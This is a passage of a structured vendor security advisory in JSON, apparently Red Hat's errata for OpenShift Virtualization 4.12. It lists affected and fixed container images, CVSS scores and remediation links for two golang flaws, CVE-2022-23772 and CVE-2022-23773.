"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053532", }, ], notes: [ { category: "description", text: "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", title: "Vulnerability description", }, { category: "summary", text: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23772", }, { category: "external", summary: "RHBZ#2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23772", url: "https://www.cve.org/CVERecord?id=CVE-2022-23772", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-01-19T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", }, { cve: "CVE-2022-23773", cwe: { id: "CWE-1220", name: "Insufficient Granularity of Access Control", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053541", }, ], notes: [ { category: "description", text: "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", title: "Vulnerability description", }, { category: "summary", text: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", 